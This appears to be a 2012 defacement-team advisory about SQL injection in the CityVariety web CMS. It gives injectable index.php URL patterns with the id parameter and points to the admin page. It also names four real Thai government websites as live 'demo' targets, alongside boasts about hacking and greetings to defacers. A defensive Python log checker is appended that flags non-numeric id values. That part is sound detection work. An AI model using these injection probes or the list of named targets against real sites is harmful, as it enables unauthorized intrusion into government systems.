
CityVariety SQL Injection

Posted on 23 January 2012

=================================================================================
Web    : ashiyane.org
e-mail : HashoR [DOT] BackHat [AT] Gmail.Com
#########################################
I'm HashoR, a member of ashiyane.org
-!We Love KurDestaN!-
#########################################
================================================================================
------|-------------------------------------------------------|------
####
# Exploit  : CityVariety <= SQL Injection Vulnerability
# Vendor   : http://www.cityvariety.co.th
# Author   : HashoR
# Team     : Ashiyane Digital Security Team
# E-mail   : HashoR [DOT] BackHat [AT] Gmail.Com
# Category:: webapps
# Tested on: [LinuX]
####
# ExPLo!T:
#
# http://site.com/index.php?options=news&mode=detail&id=10'
# http://site.com/index.php?options=news&mode=detail_rss&id=10'
# and every id parameter on the site is vulnerable to SQL injection!
>>>Demo:
# Demo: http://www.sk-local.go.th/index.php?options=news&mode=detail_rss&id=435'
# Demo: http://www.sawaid.go.th/index.php?options=wbdetailall&id=9745'
# Demo: http://www.prasong.go.th/index.php?options=wbdetailall&id=9745'
# Demo: http://www.bannacity.go.th/index.php?options=wbdetailall&id=9745'
# All are government targets!
>>>
# Admin Page:
# http://site.com/admin/
>>>
[+] LoL.......
# • We Will Never Stop Hacking • It's not a game • It's Our Job enjoy!
||> Special Greeting To: All members in Ashiyane.org
||> Special Greeting To: All members in KurdHackTeaM
####
# Owned BoX: KurdHackTeaM - brwsk007 - SA3D HaCk3D Behrooz_Ice - Q7x - Sha2ow - Virangar - Azazel - Ali_Eagle - keivan taghva - elvator - mmilad200 - PrinceofHacking - iman_taktaz - ERroR Black - Rz04 - ruin3r - Gladiator - unique2world - EroRR M3QD4D - Http://Askn - Classic - n3me3iz - Zend - r3d.z0nE HIDDEN-HUNTER - Hijacker - AliAkh - A.S.P.I.R.I.N - *Alexander* - Pr0grammer- HASSAN20- AR455
Greetz: hashor- ArmanSoftware - removal_load - B3HR0Z - @Master - Satanic2000 - N4H - angola
And All Ashiyane Defacers
------|-------------------------------------------------------|------
#D:: ___ ____ ____
#````______/```\__//```\__/____
#``_/```\_/``:```````````//____
#`/|``````:``:``..``````/ HashoR
#|`|`````::`````::``````````````/
#|`|`````:|`````||``````\______/
#|`|`````||`````||``````|``/``|
#`|`````||`````||``````|```/`|`
#``|`````||`````||``````|``/`/_`
#``|`___`||`___`||``````|`/``/````
#```\_-_/``\_-_/`|`____`|/__/``````
#````````````````_\_--_/`````````/
#```````````````/____```````````/
#``````````````/``````````````/
#``````````````\______\_______/
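
Added example (not part of the original advisory, and not CityVariety code): a log check a site operator can run to find requests to index.php whose id parameter is not a plain integer, which is the request shape listed under "ExPLo!T" above. The log lines, client addresses, the combined-log layout and the 10-digit limit on id are assumptions constructed for the example; the same allowlist check (is_valid_id) is what the application or a reverse proxy should enforce before the value reaches a query, together with parameterized queries.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format); client IPs are
# documentation addresses and the paths mirror the routes named in the advisory.
SAMPLE_LOG = """\
198.51.100.7 - - [23/Jan/2012:10:01:02 +0000] "GET /index.php?options=news&mode=detail&id=10 HTTP/1.1" 200 5120
198.51.100.9 - - [23/Jan/2012:10:01:05 +0000] "GET /index.php?options=news&mode=detail&id=10' HTTP/1.1" 200 312
198.51.100.9 - - [23/Jan/2012:10:01:09 +0000] "GET /index.php?options=news&mode=detail_rss&id=435%27 HTTP/1.1" 500 0
203.0.113.4 - - [23/Jan/2012:10:02:11 +0000] "GET /index.php?options=wbdetailall&id=9745 HTTP/1.1" 200 8841
203.0.113.4 - - [23/Jan/2012:10:02:30 +0000] "GET /admin/ HTTP/1.1" 200 1433
"""

# client, timestamp, method, request target, status
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')
# Assumption: record ids are short decimal integers.
NUMERIC_ID = re.compile(r'\A[0-9]{1,10}\Z')


def is_valid_id(value):
    """Allowlist check for the id parameter: digits only, nothing else."""
    return bool(NUMERIC_ID.match(value))


def suspicious_requests(log_text):
    """Return (client, timestamp, path, decoded id, status) for every
    index.php request whose id value fails the allowlist check."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a request line in the expected layout
        client, ts, _method, target, status = m.groups()
        url = urlsplit(target)
        if not url.path.endswith("/index.php"):
            continue
        # parse_qs percent-decodes, so id=435%27 and id=435' are treated alike
        for value in parse_qs(url.query, keep_blank_values=True).get("id", []):
            if not is_valid_id(value):
                hits.append((client, ts, url.path, value, int(status)))
    return hits


if __name__ == "__main__":
    for hit in suspicious_requests(SAMPLE_LOG):
        print(hit)
```

A flagged request that returned a 500 or an unusually small 200 response is worth correlating with database error logs for the same timestamp.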

 
